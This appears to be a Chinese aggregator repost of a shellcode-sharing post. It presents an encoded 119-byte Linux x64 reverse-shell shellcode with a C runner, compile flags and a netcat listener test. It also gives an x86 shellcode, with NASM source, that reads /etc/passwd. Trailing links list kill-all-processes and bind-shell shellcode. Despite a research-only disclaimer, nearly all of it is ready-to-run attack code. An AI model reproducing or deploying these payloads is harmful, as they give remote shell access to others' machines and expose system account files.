[shellcode分享]Linux/x64 - 反向 (0.0.0.0:1907/TCP) Shell Shellcode (119 字节)
Posted IT鹅
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[shellcode分享]Linux/x64 - 反向 (0.0.0.0:1907/TCP) Shell Shellcode (119 字节)相关的知识,希望对你有一定的参考价值。
免责声明:
本POC程序仅供安全研究与教学之用,使用者将其信息做其他用途,由使用者承担全部法律及连带责任,CSDN博客平台及博主IT鹅不承担任何法律及连带责任。
Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)
*
reverse shell tcp (1907) port shellcode C language - Linux/x86_64
Author : Kağan Çapar
contact: kagancapar@gmail.com
shellcode len : 119 bytes
compilation: gcc -fno-stack-protector -z execstack reverse-shell.c -o reverse-shell
Test:
run your machine: nc -vlp 1907
and run exploit (./reverse-shell)
check shellcode raw and test ls, who, pwd command.
: 0x48 0x31 0xc9 0x48 0x81 0xe9 0xf6 0xff
: 0xff 0xff 0x48 0x8d 0x05 0xef 0xff 0xff
: 0xff 0x48 0xbb 0xdf 0x4b 0x06 0xb1 0x71
: 0x71 0x46 0x28 0x48 0x31 0x58 0x27 0x48
: 0x2d 0xf8 0xff 0xff 0xff 0xe2 0xf4 0xb5
: 0x62 0x5e 0x28 0x1b 0x73 0x19 0x42 0xde
: 0x15 0x09 0xb4 0x39 0xe6 0x0e 0x91 0xdd
: 0x4b 0x01 0xc2 0x0e 0x71 0x46 0x29 0x8e
: 0x03 0x8f 0x57 0x1b 0x61 0x1c 0x42 0xf5
: 0x13 0x09 0xb4 0x1b 0x72 0x18 0x60 0x20
: 0x85 0x6c 0x90 0x29 0x7e 0x43 0x5d 0x29
: 0x21 0x3d 0xe9 0xe8 0x39 0xfd 0x07 0xbd
: 0x22 0x68 0x9e 0x02 0x19 0x46 0x7b 0x97
: 0xc2 0xe1 0xe3 0x26 0x39 0xcf 0xce 0xd0
: 0x4e 0x06 0xb1 0x71 0x71 0x46 0x28
assembly code is below:
xor %rcx,%rcx
sub $0xfffffffffffffff6,%rcx
lea -0x11(%rip),%rax # 0x555555558060
movabs $0x28467171b1064bdf,%rbx
xor %rbx,0x27(%rax)
sub $0xfffffffffffffff8,%rax
loop 0x55555555807b
mov $0x62,%ch
pop %rsi
sub %bl,(%rbx)
jae 0x5555555580a7
rex.X ficoms -0x19c64bf7(%rip) # 0x55553b8f349e
xchg %eax,%ecx
fisttpll 0x1(%rbx)
retq $0x710e
rex.RX sub %r9d,0x1b578f03(%rsi)
(bad)
sbb $0x42,%al
cmc
adc (%rcx),%ecx
mov $0x1b,%ah
jb 0x5555555580c6
and %al,0x7e29906c(%rbp)
rex.XB pop %r13
sub %esp,(%rcx)
cmp $0xfd39e8e9,%eax
mov $0x29e6822,%ebp
sbb %eax,0x7b(%rsi)
xchg %eax,%edi
retq $0xe3e1
es cmp %ecx,%edi
rorb 0x6(%rsi)
mov $0x71,%cl
jno 0x55555555811c
sub %al,(%rax)
*/
#include
#include
unsigned char shellproccod[] = \\
"\\x48\\x31\\xc9\\x48\\x81\\xe9\\xf6\\xff\\xff\\xff\\x48\\x8d\\x05\\xef\\xff"
"\\xff\\xff\\x48\\xbb\\xdf\\x4b\\x06\\xb1\\x71\\x71\\x46\\x28\\x48\\x31\\x58"
"\\x27\\x48\\x2d\\xf8\\xff\\xff\\xff\\xe2\\xf4\\xb5\\x62\\x5e\\x28\\x1b\\x73"
"\\x19\\x42\\xde\\x15\\x09\\xb4\\x39\\xe6\\x0e\\x91\\xdd\\x4b\\x01\\xc2\\x0e"
"\\x71\\x46\\x29\\x8e\\x03\\x8f\\x57\\x1b\\x61\\x1c\\x42\\xf5\\x13\\x09\\xb4"
"\\x1b\\x72\\x18\\x60\\x20\\x85\\x6c\\x90\\x29\\x7e\\x43\\x5d\\x29\\x21\\x3d"
"\\xe9\\xe8\\x39\\xfd\\x07\\xbd\\x22\\x68\\x9e\\x02\\x19\\x46\\x7b\\x97\\xc2"
"\\xe1\\xe3\\x26\\x39\\xcf\\xce\\xd0\\x4e\\x06\\xb1\\x71\\x71\\x46\\x28";
int main()
printf("Shellcode len: %d\\n", strlen(shellproccod));
int (*ret)() = (int(*)())shellproccod;
ret();
Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode(61 字节)
; Exploit Title: /usr/bin/head -n99 cat etc/passwd (poly shellcode-571.php)
; Date: November 29th, 2018
; Exploit Author: Nelis
; Version: 0.2
; Tested on: Ubuntu 12.10
; Filename: headpass.nasm
; SLAE-ID: 1327
; Based on: http://shell-storm.org/shellcode/files/shellcode-571.php
; Shellcode:"\\x29\\xc0\\x50\\x68\\x73\\x73\\x77\\x64\\x68\\x63\\x2f\\x70\\x61\\x68\\x2f\\x2f\\x65\\x74\\x89\\xe6\\x50\\x68\\x2d\\x6e\\x39\\x39\\x89\\xe7\\x50\\x68\\x68\\x65\\x61\\x64\\x68\\x62\\x69\\x6e\\x2f\\x68\\x2f\\x2f\\x2f\\x2f\\x68\\x2f\\x75\\x73\\x72\\x89\\xe3\\x50\\x57\\x56\\x53\\xb0\\x0b\\x89\\xe1\\xcd\\x80"
global _start
section .text
_start:
sub eax, eax ; changed from xor eax, eax
push eax ; put 0-term on stack
push dword 0x64777373 ; dwss
push dword 0x61702f63 ; ap/c
push dword 0x74652f2f ; te//
mov esi, esp ; save addr of stack into esi
push eax
push dword 0x39396e2d ; 99n-
mov edi, esp ; save addr of stack into edi
push eax
push dword 0x64616568 ; daeh
push dword 0x2f6e6962 ; /nib
push dword 0x2f2f2f2f ;
push dword 0x7273752f ; rsu/ changed from cat to head command
mov ebx,esp ; unchanged (save addr of stack into into ebx)
; mov edx, eax ; set edx to NULL / not already 0x0 / keeping it here in case you encouter issues with it
push eax ; 0-term on stack
push edi ; added for args
push esi ; added for args
push ebx ; pointer to /userbin/head
mov al, 0xb ; set syscall execve
mov ecx,esp ; move stack pointer into ecx
int 0x80 ; make syscall
以上是关于[shellcode分享]Linux/x64 - 反向 (0.0.0.0:1907/TCP) Shell Shellcode (119 字节)的主要内容,如果未能解决你的问题,请参考以下文章
[shellcode分享]Linux/x86 - 杀死所有进程 Shellcode(14 字节)
[shellcode分享]Linux/x86 - 杀死所有进程 Shellcode(14 字节)
[shellcode分享]Linux/x86 - 绑定 (99999/TCP) NetCat 传统 (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)
[shellcode分享]Linux/x86 - 绑定 (99999/TCP) NetCat 传统 (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)
[shellcode分享]Linux/x86 - 绑定 (99999/TCP) NetCat 传统 (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)